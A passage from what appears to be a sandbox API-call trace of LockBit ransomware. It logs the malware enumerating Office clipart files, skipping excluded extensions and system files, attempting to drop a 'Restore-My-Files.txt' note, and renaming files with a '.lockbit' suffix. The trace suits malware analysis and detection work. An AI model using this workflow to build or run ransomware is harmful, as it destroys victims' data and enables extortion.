Office\\CLIPART\\PUB60COR\\J0228823.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.956] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.957] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.957] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x918c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0228959.WMF", cAlternateFileName="")) returned 1 [0152.957] lstrcmpiW (lpString1=".", lpString2="J0228959.WMF") returned -1 [0152.957] lstrcmpiW (lpString1="..", lpString2="J0228959.WMF") returned -1 [0152.957] PathFindExtensionW (pszPath="J0228959.WMF") returned=".WMF" [0152.957] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.957] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.958] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.958] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.959] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0228959.WMF") returned 1 [0152.959] lstrcmpiW (lpString1="ntldr", lpString2="J0228959.WMF") returned 1 [0152.959] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0228959.WMF") returned 1 [0152.959] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0228959.WMF") returned -1 [0152.960] lstrcmpiW (lpString1="autorun.inf", lpString2="J0228959.WMF") returned -1 [0152.960] lstrcmpiW (lpString1="thumbs.db", lpString2="J0228959.WMF") returned 1 [0152.960] lstrcmpiW (lpString1="iconcache.db", lpString2="J0228959.WMF") returned -1 [0152.960] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.960] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF") returned=".WMF" [0152.960] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.960] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.960] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.961] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.961] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF.lockbit") returned 72 [0152.961] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228959.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0152.966] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.966] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.966] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=37260) returned 1 [0152.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.967] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.969] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.969] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.970] free (_Block=0x1fa2ed8) [0152.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.970] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.970] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1daa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0230553.WMF", cAlternateFileName="")) returned 1 [0152.970] lstrcmpiW (lpString1=".", lpString2="J0230553.WMF") returned -1 [0152.970] lstrcmpiW (lpString1="..", lpString2="J0230553.WMF") returned -1 [0152.970] PathFindExtensionW (pszPath="J0230553.WMF") returned=".WMF" [0152.970] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.970] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.971] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.972] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.972] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0230553.WMF") returned 1 [0152.972] lstrcmpiW (lpString1="ntldr", lpString2="J0230553.WMF") returned 1 [0152.972] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0230553.WMF") returned 1 [0152.972] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0230553.WMF") returned -1 [0152.972] lstrcmpiW (lpString1="autorun.inf", lpString2="J0230553.WMF") returned -1 [0152.972] lstrcmpiW (lpString1="thumbs.db", lpString2="J0230553.WMF") returned 1 [0152.973] lstrcmpiW (lpString1="iconcache.db", lpString2="J0230553.WMF") returned -1 [0152.973] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.973] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF") returned=".WMF" [0152.973] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.973] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.973] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.974] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.974] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.974] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.974] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.974] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.974] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.974] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF.lockbit") returned 72 [0152.974] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0230553.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.978] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.978] malloc (_Size=0x40068) returned 0x3d70450 [0152.978] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7594) returned 1 [0152.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.979] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.982] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.983] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.984] free (_Block=0x1fa2ed8) [0152.984] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.984] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.984] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1066, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0230558.WMF", cAlternateFileName="")) returned 1 [0152.984] lstrcmpiW (lpString1=".", lpString2="J0230558.WMF") returned -1 [0152.984] lstrcmpiW (lpString1="..", lpString2="J0230558.WMF") returned -1 [0152.984] PathFindExtensionW (pszPath="J0230558.WMF") returned=".WMF" [0152.984] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.984] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.985] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.985] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0230558.WMF") returned 1 [0152.986] lstrcmpiW (lpString1="ntldr", lpString2="J0230558.WMF") returned 1 [0152.986] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0230558.WMF") returned 1 [0152.986] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0230558.WMF") returned -1 [0152.986] lstrcmpiW (lpString1="autorun.inf", lpString2="J0230558.WMF") returned -1 [0152.986] lstrcmpiW (lpString1="thumbs.db", lpString2="J0230558.WMF") returned 1 [0152.986] lstrcmpiW (lpString1="iconcache.db", lpString2="J0230558.WMF") returned -1 [0152.986] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.986] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF") returned=".WMF" [0152.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.986] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 